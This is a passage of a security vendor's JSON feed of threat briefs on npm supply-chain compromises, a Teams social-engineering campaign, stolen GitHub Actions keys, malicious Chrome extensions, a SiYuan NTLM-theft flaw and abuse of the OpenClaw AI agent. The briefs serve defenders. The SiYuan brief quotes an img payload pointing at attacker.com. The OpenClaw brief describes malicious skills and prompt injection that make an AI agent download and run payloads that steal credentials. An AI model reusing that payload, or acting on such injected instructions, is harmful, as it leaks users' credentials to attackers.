The use of stolen credentials to modify other packages increases the scope of the attack, potentially impacting a large number of developers and organizations using the compromised SAP packages.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor npm package installations for the presence of \u003ccode\u003epreinstall\u003c/code\u003e scripts executing unusual processes, such as the execution of \u003ccode\u003esetup.mjs\u003c/code\u003e or the download of the Bun JavaScript runtime from GitHub; implement the \u003ccode\u003eDetect Suspicious NPM Package Preinstall Script\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement the \u003ccode\u003eDetect GitHub Repository Creation with \u0026quot;A Mini Shai-Hulud has Appeared\u0026quot; Description\u003c/code\u003e Sigma rule to detect exfiltration attempts via public GitHub repositories.\u003c/li\u003e\n\u003cli\u003eAudit CI/CD pipeline configurations and restrict access to sensitive credentials and secrets to prevent exposure via misconfigured jobs; remediate the reported CircleCI misconfiguration.\u003c/li\u003e\n\u003cli\u003eMonitor process memory for credential harvesting activity targeting Runner processes in CI/CD environments, specifically looking for reads of \u003ccode\u003e/proc/\u0026lt;pid\u0026gt;/maps\u003c/code\u003e and \u003ccode\u003e/proc/\u0026lt;pid\u0026gt;/mem\u003c/code\u003e as outlined in the overview.\u003c/li\u003e\n\u003cli\u003eDeprecate and remove the compromised packages \u003ccode\u003e@cap-js/sqlite\u003c/code\u003e (v2.2.2), \u003ccode\u003e@cap-js/postgres\u003c/code\u003e (v2.2.2), \u003ccode\u003e@cap-js/db-service\u003c/code\u003e (v2.10.1), and \u003ccode\u003embt\u003c/code\u003e (v1.2.48) from your development and CI/CD 
environments.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-29T22:43:44Z","date_published":"2026-04-29T22:43:44Z","id":"/briefs/2026-04-sap-npm-compromise/","summary":"Multiple official SAP npm packages were compromised via a supply chain attack, likely by TeamPCP, to steal credentials and authentication tokens from developers' systems.","title":"Compromised SAP npm Packages Steal Developer Credentials","url":"https://feed.craftedsignal.io/briefs/2026-04-sap-npm-compromise/"},{"_cs_actors":["UNC6692"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Teams","Chromium"],"_cs_severities":["high"],"_cs_tags":["social-engineering","malware","cloud-abuse","credential-theft","lateral-movement"],"_cs_type":"threat","_cs_vendors":["Microsoft","Google","Amazon"],"content_html":"\u003cp\u003eUNC6692 is a newly tracked, financially motivated threat group that employs a multi-stage intrusion campaign combining persistent social engineering and custom modular malware. The actor begins by flooding a target\u0026rsquo;s email inbox before contacting them via Microsoft Teams, posing as help desk personnel to resolve the issue. This leads to a phishing attack where victims are tricked into downloading and executing malicious payloads. UNC6692 abuses legitimate cloud infrastructure, specifically AWS S3 buckets, for payload delivery, command and control (C2), and data exfiltration, allowing them to bypass traditional network reputation filters. The group\u0026rsquo;s operations are focused on gaining access and stealing credentials for further actions, ultimately aiming to exfiltrate data of interest from compromised systems. 
The initial campaign was observed in late December.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker floods a target\u0026rsquo;s email inbox to create a sense of urgency.\u003c/li\u003e\n\u003cli\u003eThe attacker contacts the target via Microsoft Teams, impersonating help desk personnel.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a phishing link via Teams, promising a local patch to fix the email spamming issue.\u003c/li\u003e\n\u003cli\u003eThe target clicks the link, which downloads a renamed AutoHotKey binary and an AutoHotkey script from a threat actor-controlled AWS S3 bucket.\u003c/li\u003e\n\u003cli\u003eExecution of the AutoHotKey binary automatically runs the script, initiating reconnaissance commands and installing the SNOWBELT malicious Chromium browser extension.\u003c/li\u003e\n\u003cli\u003eSNOWBELT facilitates the download of additional tools, including the Snowglaze Python tunneler, the Snowbasin Python bindshell (used as a persistent backdoor), additional AutoHotkey scripts, and a portable Python executable with required libraries.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a Python script to scan the local network for ports 135, 445, and 3389 and enumerate local administrator accounts.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a local administrator account to initiate an RDP session via Snowglaze from the compromised system to a backup server, then dumps LSASS process memory and uses pass-the-hash to move laterally to the domain controller.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe UNC6692 attack leads to the compromise of targeted systems, credential theft, and potential data exfiltration. If successful, the attacker gains control over the domain controller, allowing them to access sensitive information and potentially cause significant damage to the organization. 
The abuse of AWS S3 buckets allows the threat actor to blend in with legitimate cloud traffic, making detection more difficult. The financial motivation suggests that stolen credentials and data could be used for further malicious activities, such as ransomware attacks or sale on the dark web.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor for AutoHotKey execution, especially when associated with downloads from unusual locations like AWS S3 buckets, to detect initial payload execution (see Sigma rule below).\u003c/li\u003e\n\u003cli\u003eImplement network monitoring to detect unusual RDP connections initiated from compromised systems to internal servers, as this is a key lateral movement technique used by UNC6692 (see Sigma rule below).\u003c/li\u003e\n\u003cli\u003eMonitor for the installation of new Chromium extensions, especially those not distributed through the Chrome Web Store, as this is how the SNOWBELT malware is deployed.\u003c/li\u003e\n\u003cli\u003eMonitor for the use of Python scripts to scan the local network for open ports (135, 445, 3389) and enumerate local administrator accounts.\u003c/li\u003e\n\u003cli\u003eInvestigate any Microsoft Teams messages delivering links that promise to fix technical problems, as this is the initial social engineering tactic used by UNC6692.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T14:00:00Z","date_published":"2026-04-28T14:00:00Z","id":"/briefs/2026-04-unc6692-social-engineering/","summary":"UNC6692 is a newly discovered, financially motivated threat actor that combines social engineering via Microsoft Teams, custom malware named SNOWBELT, and abuse of legitimate AWS S3 cloud infrastructure in its attack campaigns to steal credentials and prepare for data exfiltration.","title":"UNC6692 Combines Social Engineering, Malware, and Cloud 
Abuse","url":"https://feed.craftedsignal.io/briefs/2026-04-unc6692-social-engineering/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["AWS IAM","GitHub Actions"],"_cs_severities":["high"],"_cs_tags":["cloud","aws","github","credential-theft","initial-access","lateral-movement"],"_cs_type":"advisory","_cs_vendors":["Amazon","Microsoft","Google"],"content_html":"\u003cp\u003eThis threat involves the unauthorized use of AWS credentials stolen from GitHub Actions secrets. Attackers exfiltrate these credentials and use them from their own infrastructure, bypassing the intended CI/CD environment. The activity is detected by observing AWS access keys appearing in CloudTrail logs originating from both legitimate GitHub Actions runners (identified by Microsoft ASN or the \u003ccode\u003egithub-actions\u003c/code\u003e user agent string) and suspicious infrastructure outside the expected CI/CD provider ASNs (Amazon, Google, Microsoft). This indicates a breach of GitHub repository or organization secrets, leading to potential unauthorized access and control over AWS resources. This activity can begin with compromised GitHub accounts.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains unauthorized access to a GitHub repository or organization with AWS credentials stored as secrets.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates the AWS access key ID and secret access key, either manually or through automated means, such as modifying a GitHub Action workflow to expose the secrets.\u003c/li\u003e\n\u003cli\u003eThe attacker configures the stolen AWS credentials on their own infrastructure, using tools like the AWS CLI or boto3.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to authenticate to AWS using the stolen credentials. 
This generates CloudTrail logs with the attacker\u0026rsquo;s source IP address and ASN.\u003c/li\u003e\n\u003cli\u003eThe attacker performs reconnaissance activities, such as calling \u003ccode\u003ests:GetCallerIdentity\u003c/code\u003e, \u003ccode\u003eListBuckets\u003c/code\u003e, \u003ccode\u003eDescribeInstances\u003c/code\u003e, or \u003ccode\u003eListUsers\u003c/code\u003e, to understand the AWS environment and identify potential targets.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to escalate privileges or move laterally within the AWS environment by exploiting the compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker may create, modify, or delete AWS resources, such as EC2 instances, S3 buckets, or IAM roles, depending on the permissions associated with the stolen credentials.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation leads to unauthorized access to AWS resources, potentially resulting in data breaches, service disruptions, or financial losses. The impact depends on the permissions associated with the stolen AWS credentials. A single compromised credential could expose sensitive data, disrupt critical services, or allow attackers to deploy malicious infrastructure within the victim\u0026rsquo;s AWS environment. 
Identifying and responding to this threat quickly is vital to minimize damages.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;AWS Credentials Used from GitHub Actions and Non-CI/CD Infrastructure\u0026rdquo; to your SIEM and tune for your environment to detect suspicious usage patterns.\u003c/li\u003e\n\u003cli\u003eRotate the compromised AWS access key in IAM immediately and update the corresponding GitHub repository/organization secret as described in the rule documentation.\u003c/li\u003e\n\u003cli\u003eImplement OIDC-based authentication (\u003ccode\u003eaws-actions/configure-aws-credentials\u003c/code\u003e with \u003ccode\u003erole-to-assume\u003c/code\u003e) instead of long-lived access keys as mentioned in the rule documentation.\u003c/li\u003e\n\u003cli\u003eIf using OIDC, add IP condition policies to the IAM role trust policy to restrict \u003ccode\u003eAssumeRoleWithWebIdentity\u003c/code\u003e to known GitHub runner IP ranges, based on the information in the rule documentation.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-22T17:45:55Z","date_published":"2026-04-22T17:45:55Z","id":"/briefs/2024-01-aws-github-actions-credential-theft/","summary":"Attackers are stealing AWS credentials configured as GitHub Actions secrets and using them from non-CI/CD infrastructure, indicating potential credential theft and unauthorized access to AWS resources.","title":"AWS Credentials Used from GitHub Actions and Non-CI/CD Infrastructure","url":"https://feed.craftedsignal.io/briefs/2024-01-aws-github-actions-credential-theft/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["chrome-extension","credential-theft","backdoor","ad-injection","exfiltration"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA coordinated campaign involving 108 malicious Chrome extensions has been 
discovered. These extensions, distributed through five accounts (GameGen, InterAlt, SideGames, Rodeo Games, and Yana Project), are designed to steal user data, inject ads, and create backdoors. Over 20,000 users have installed these extensions. The extensions provide expected functionality to avoid suspicion, but malicious code runs in the background, communicating with a shared C\u0026amp;C infrastructure to perform nefarious activities. The extensions target various user types by masquerading as Telegram sidebar clients, slot machine and Keno games, YouTube and TikTok enhancers, a text translation tool, and page utility extensions. This campaign poses a significant threat to user privacy and system security.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUsers install malicious Chrome extensions from the Chrome Web Store, believing they are legitimate tools (e.g., Telegram clients, games, enhancers).\u003c/li\u003e\n\u003cli\u003eUpon installation, the extensions execute JavaScript code in the background.\u003c/li\u003e\n\u003cli\u003eExtensions designed for credential theft acquire Google OAuth2 Bearer tokens and exfiltrate user information (email, name, profile picture) to a remote server.\u003c/li\u003e\n\u003cli\u003eExtensions targeting Telegram steal the active Telegram Web session by overwriting local storage with attacker-supplied data and force-reloading Telegram.\u003c/li\u003e\n\u003cli\u003eSome extensions contain a backdoor that opens an arbitrary URL received from the C\u0026amp;C server in a new tab upon browser start.\u003c/li\u003e\n\u003cli\u003eOther malicious activities include injecting ads into YouTube and TikTok pages, injecting content scripts into all visited pages, or proxying translation requests through attacker-controlled servers.\u003c/li\u003e\n\u003cli\u003eThe attacker gains access to user accounts (Google, Telegram) and can inject malicious content, redirect traffic, 
and steal sensitive information.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eOver 20,000 users have been affected by these malicious extensions. The campaign targets a broad range of users by using different categories of extensions. Successful exploitation can lead to stolen credentials, account takeover, data exfiltration, ad fraud, and the ability to inject arbitrary content into visited websites. The compromised systems could be used for further malicious activities.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor network connections originating from Chrome extensions for connections to unusual or suspicious domains using a network connection rule (see example rule below).\u003c/li\u003e\n\u003cli\u003eImplement strict policies for Chrome extension installations, including whitelisting approved extensions and blocking installation from untrusted sources.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect the execution of scripts from the malicious extensions to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-16T12:00:00Z","date_published":"2026-04-16T12:00:00Z","id":"/briefs/2026-04-chrome-extension-backdoor/","summary":"A coordinated campaign uses 108 malicious Chrome extensions to steal user data, inject ads, and establish backdoors on over 20,000 systems via a shared command-and-control infrastructure.","title":"Malicious Chrome Extensions Stealing Data and Opening Backdoors","url":"https://feed.craftedsignal.io/briefs/2026-04-chrome-extension-backdoor/"},{"_cs_actors":[],"_cs_cves":[{"id":"CVE-2026-40107"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["siyuan","ntlm","ssrf","credential-theft","mermaid"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSiYuan, a note-taking application, is vulnerable to a zero-click NTLM 
hash theft and blind SSRF exploit due to insecure configuration of Mermaid.js. The application configures Mermaid.js with \u003ccode\u003esecurityLevel: \u0026quot;loose\u0026quot;\u003c/code\u003e and \u003ccode\u003ehtmlLabels: true\u003c/code\u003e, which allows \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tags with \u003ccode\u003esrc\u003c/code\u003e attributes to bypass sanitization and be injected into SVG \u003ccode\u003e\u0026lt;foreignObject\u0026gt;\u003c/code\u003e blocks. When a user opens a note containing a malicious Mermaid diagram with a protocol-relative URL (e.g., \u003ccode\u003e//attacker.com/image.png\u003c/code\u003e), the Electron client fetches the URL. On Windows, this resolves as a UNC path, triggering SMB authentication and sending the victim\u0026rsquo;s NTLMv2 hash to the attacker. On macOS and Linux, the same diagram triggers an HTTP request to the attacker\u0026rsquo;s server, exfiltrating the victim\u0026rsquo;s IP address. The vulnerability affects SiYuan versions prior to the fix implemented after April 7, 2026. 
This allows for credential theft without any user interaction beyond opening a note.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious SiYuan note containing a Mermaid diagram with a protocol-relative URL within an \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tag, such as \u003ccode\u003e\u0026lt;img src='//attacker.com/share/img.png'\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the malicious note (e.g., via sharing or a crafted .sy export).\u003c/li\u003e\n\u003cli\u003eThe victim opens the note in SiYuan.\u003c/li\u003e\n\u003cli\u003eSiYuan renders the Mermaid diagram using the insecure Mermaid.js configuration.\u003c/li\u003e\n\u003cli\u003eThe SVG containing the malicious \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tag is injected into the DOM via \u003ccode\u003einnerHTML\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe Electron client attempts to fetch the resource at the protocol-relative URL.\u003c/li\u003e\n\u003cli\u003eOn Windows, the protocol-relative URL resolves to a UNC path (\u003ccode\u003e\\\\attacker.com\\share\\img.png\u003c/code\u003e), initiating an SMB connection.\u003c/li\u003e\n\u003cli\u003eOn Windows, the victim\u0026rsquo;s NTLMv2 hash is automatically sent to the attacker\u0026rsquo;s SMB server; on other platforms, the client makes an HTTP request that leaks the victim\u0026rsquo;s IP address.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe vulnerability allows for zero-click NTLMv2 hash theft on Windows systems, where the victim only needs to open a note containing the malicious Mermaid diagram. The stolen NTLMv2 hashes can be cracked offline or used in relay attacks to gain unauthorized access to the victim\u0026rsquo;s resources. 
On all platforms, this vulnerability can be exploited to perform blind SSRF and leak the victim\u0026rsquo;s IP address, acting as a tracking pixel to confirm when the note was opened. This affects all SiYuan users who receive a crafted note.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SiYuan Mermaid NTLM Theft Attempt\u003c/code\u003e to identify SMB traffic originating from SiYuan processes attempting to connect to external IPs (network_connection log source).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SiYuan Mermaid SSRF Attempt\u003c/code\u003e to detect HTTP requests from SiYuan to external IP addresses with a suspicious URL (network_connection log source).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for SMB connections originating from SiYuan, especially to unusual or external destinations (network_connection log source).\u003c/li\u003e\n\u003cli\u003eBlock the attacker\u0026rsquo;s domain (\u003ccode\u003eattacker.com\u003c/code\u003e) at the DNS resolver, as observed in the malicious Mermaid diagram example (iocs).\u003c/li\u003e\n\u003cli\u003eUpgrade SiYuan to a patched version that addresses CVE-2026-40107 to mitigate the underlying vulnerability.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-11T12:00:00Z","date_published":"2026-04-11T12:00:00Z","id":"/briefs/2026-04-siyuan-ntlm-ssrf/","summary":"SiYuan is vulnerable to zero-click NTLM hash theft on Windows and blind SSRF on all platforms due to insecure Mermaid.js configuration, where a malicious Mermaid diagram containing a protocol-relative URL can be injected into a note, causing the Electron client to fetch the URL, triggering SMB authentication on Windows and sending the victim's NTLMv2 hash to the attacker. 
On macOS and Linux, the request acts as a tracking pixel and blind SSRF.","title":"SiYuan Zero-Click NTLM Theft and Blind SSRF via Mermaid Diagrams","url":"https://feed.craftedsignal.io/briefs/2026-04-siyuan-ntlm-ssrf/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["ai-agent","execution","malware","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOpenClaw (formerly Clawdbot, rebranded to Moltbot) is an AI coding assistant that can execute shell commands and scripts. Threat actors are exploiting the skill ecosystem (ClawHub) to distribute malicious skills, observed as early as January 2026, that execute download-and-execute commands, targeting cryptocurrency wallets and credentials. These skills are often obfuscated and distributed through public registries like ClawHub. The attacks leverage the AI agents\u0026rsquo; ability to execute commands through skills or prompt injection. Defenders should monitor for suspicious child processes spawned by Node.js processes running OpenClaw/Moltbot, as these may indicate malicious activity originating from compromised or malicious skills. 
This activity has been observed across Linux, macOS, and Windows environments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user installs the OpenClaw agent, potentially from a legitimate or typosquatted domain.\u003c/li\u003e\n\u003cli\u003eThe user installs a malicious skill from ClawHub or is subject to a prompt injection attack.\u003c/li\u003e\n\u003cli\u003eThe OpenClaw agent, running under Node.js, receives a command to execute a shell command.\u003c/li\u003e\n\u003cli\u003eThe Node.js process spawns a shell process (e.g., bash, sh, cmd.exe, powershell.exe).\u003c/li\u003e\n\u003cli\u003eThe shell process executes a command to download a payload from a remote server using tools like curl or certutil.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is saved to disk, often with an obfuscated name.\u003c/li\u003e\n\u003cli\u003eThe shell process executes the downloaded payload using chmod +x and ./, rundll32.exe, or powershell.exe.\u003c/li\u003e\n\u003cli\u003eThe payload performs malicious actions such as credential theft or cryptocurrency wallet compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised OpenClaw agents can lead to cryptocurrency wallet theft, credential compromise, and potential data exfiltration. A successful attack allows threat actors to gain access to sensitive data and potentially pivot to other systems on the network. The number of victims is currently unknown, but the targeting of cryptocurrency wallets suggests financially motivated actors. 
The observed typosquatting activity indicates a campaign to impersonate the legitimate software and trick users into installing malicious versions.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for suspicious child processes of Node.js processes running OpenClaw/Moltbot, specifically shells and scripting interpreters, using the provided Sigma rule (\u003ca href=\"#execution-via-openclaw-agent---linuxmacoswindows\"\u003eExecution via OpenClaw Agent - Linux/macOS/Windows\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eBlock known typosquat domains (moltbot.you, clawbot.ai, clawdbot.you) at the DNS resolver based on the IOCs provided.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unsigned or untrusted executables, mitigating the impact of downloaded payloads.\u003c/li\u003e\n\u003cli\u003eReview OpenClaw skill installation logs and user AI conversation history for signs of malicious activity or prompt injection attempts.\u003c/li\u003e\n\u003cli\u003eEnable process command-line auditing to capture the full command line of spawned processes, aiding in the identification of malicious commands.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect execution of curl/certutil downloads (\u003ca href=\"#openclaw-download-activity\"\u003eOpenClaw Download Activity\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-08T12:07:54Z","date_published":"2026-04-08T12:07:54Z","id":"/briefs/2026-06-openclaw-execution/","summary":"Malicious actors are exploiting OpenClaw, Moltbot, and Clawdbot AI coding agents via Node.js to execute arbitrary shell commands and download-and-execute commands, potentially targeting cryptocurrency wallets and credentials.","title":"OpenClaw Agent Suspicious Child Process 
Execution","url":"https://feed.craftedsignal.io/briefs/2026-06-openclaw-execution/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.4,"id":"CVE-2026-35560"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cve-2026-35560","athena","odbc","man-in-the-middle","mitm","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA man-in-the-middle (MitM) vulnerability has been identified in the Amazon Athena ODBC driver. Specifically, versions prior to 2.1.0.0 exhibit improper certificate validation within the identity provider connection components. This flaw allows a threat actor positioned in the network to intercept authentication credentials when the driver attempts to connect to external identity providers. This vulnerability, identified as CVE-2026-35560, poses a significant risk to organizations utilizing affected versions of the Athena ODBC driver with external identity providers. The lack of proper certificate validation can lead to credential compromise and subsequent unauthorized access to sensitive data within Athena. This does not affect connections directly to Athena.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker positions themselves in a privileged network location between the user\u0026rsquo;s machine and the external identity provider.\u003c/li\u003e\n\u003cli\u003eThe user attempts to establish a connection to Amazon Athena using the vulnerable ODBC driver version (prior to 2.1.0.0). 
The connection is configured to use an external identity provider for authentication.\u003c/li\u003e\n\u003cli\u003eThe ODBC driver initiates a connection to the configured external identity provider.\u003c/li\u003e\n\u003cli\u003eThe attacker intercepts the network traffic between the ODBC driver and the identity provider.\u003c/li\u003e\n\u003cli\u003eDue to the lack of proper certificate validation in the vulnerable ODBC driver, the attacker can present a fraudulent certificate to the driver without triggering an error.\u003c/li\u003e\n\u003cli\u003eThe ODBC driver, trusting the fraudulent certificate, proceeds with the authentication process and transmits the user\u0026rsquo;s credentials to the attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker captures the user\u0026rsquo;s authentication credentials (e.g., username and password or an access token).\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to authenticate to the external identity provider or directly to resources protected by those credentials, potentially gaining unauthorized access to sensitive data within Amazon Athena or other connected services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a man-in-the-middle attacker to intercept authentication credentials used to connect to external identity providers. This could lead to unauthorized access to an organization\u0026rsquo;s Amazon Athena data and other resources protected by the compromised credentials. The severity of the impact depends on the privileges associated with the compromised user account. If successful, the attacker could potentially read, modify, or delete sensitive data stored in Athena, leading to data breaches, financial losses, and reputational damage. 
The number of potential victims is directly proportional to the number of organizations using affected versions of the Athena ODBC driver with external identity providers.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Amazon Athena ODBC driver to version 2.1.0.0 or later to remediate the improper certificate validation vulnerability as documented in CVE-2026-35560.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unexpected connections to external identity providers from machines running the Athena ODBC driver. Use network connection logs to identify suspicious activity.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the potential impact of a successful man-in-the-middle attack, reducing the attacker\u0026rsquo;s ability to intercept traffic.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T21:17:12Z","date_published":"2026-04-03T21:17:12Z","id":"/briefs/2024-01-athena-odbc-mitm/","summary":"A man-in-the-middle vulnerability exists in Amazon Athena ODBC driver versions prior to 2.1.0.0 due to improper certificate validation, potentially allowing attackers to intercept authentication credentials when connecting to external identity providers.","title":"Amazon Athena ODBC Driver Man-in-the-Middle Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-athena-odbc-mitm/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","npm","rat","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 31, 2026, a supply chain attack targeted the \u003ccode\u003eaxios\u003c/code\u003e npm package, a widely used HTTP client library for JavaScript. 
Compromised versions 1.14.1 and 0.30.4 of the library were injected with malicious code that installed a cross-platform Remote Access Trojan (RAT) on systems that installed the affected versions of \u003ccode\u003e@usebruno/cli\u003c/code\u003e. This attack specifically impacted users of the \u003ccode\u003e@usebruno/cli\u003c/code\u003e who performed an \u003ccode\u003enpm install\u003c/code\u003e within a roughly 3-hour window, between 00:21 UTC and 03:30 UTC. The malicious code was designed to execute during the \u003ccode\u003epostinstall\u003c/code\u003e phase of the package installation, indicating a targeted effort to compromise developer environments. This incident highlights the increasing risk of supply chain attacks targeting open-source software and the importance of verifying the integrity of third-party dependencies.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker compromises the \u003ccode\u003eaxios\u003c/code\u003e npm package, injecting malicious code into versions 1.14.1 and 0.30.4.\u003c/li\u003e\n\u003cli\u003eThe compromised \u003ccode\u003eaxios\u003c/code\u003e package is published to the npm registry.\u003c/li\u003e\n\u003cli\u003eA user of \u003ccode\u003e@usebruno/cli\u003c/code\u003e executes \u003ccode\u003enpm install\u003c/code\u003e within the attack window (00:21 UTC - 03:30 UTC on March 31, 2026).\u003c/li\u003e\n\u003cli\u003eThe npm package manager resolves the dependency chain and downloads the compromised \u003ccode\u003eaxios\u003c/code\u003e package as a dependency of \u003ccode\u003e@usebruno/cli\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe malicious code within the \u003ccode\u003eaxios\u003c/code\u003e package executes during the \u003ccode\u003epostinstall\u003c/code\u003e script phase of the installation process.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003epostinstall\u003c/code\u003e script downloads and installs a cross-platform Remote 
Access Trojan (RAT) on the user\u0026rsquo;s system.\u003c/li\u003e\n\u003cli\u003eThe RAT establishes a connection to a remote command-and-control (C2) server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the RAT to exfiltrate credentials and other sensitive data from the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack could have resulted in widespread compromise of developer systems that used the \u003ccode\u003e@usebruno/cli\u003c/code\u003e. While the number of affected users is unknown, the incident could have led to the exfiltration of sensitive credentials and proprietary source code, potentially enabling further attacks against the affected organizations and their customers. The incident underscores the need for robust security measures in software development pipelines and continuous monitoring of third-party dependencies for malicious activity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eIf \u003ccode\u003e@usebruno/cli\u003c/code\u003e was installed during the affected window, reinstall dependencies to ensure a clean version of \u003ccode\u003eaxios\u003c/code\u003e is used (reference: Impact section).\u003c/li\u003e\n\u003cli\u003eRotate all credentials and secrets that were present on systems where \u003ccode\u003e@usebruno/cli\u003c/code\u003e was installed during the affected window (reference: Impact section).\u003c/li\u003e\n\u003cli\u003eReview and implement the security guidance provided in the Aikido Security blog post to further harden your systems (reference: \u003ca href=\"https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat\"\u003ehttps://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for unusual processes spawned by npm or node processes, using the provided 
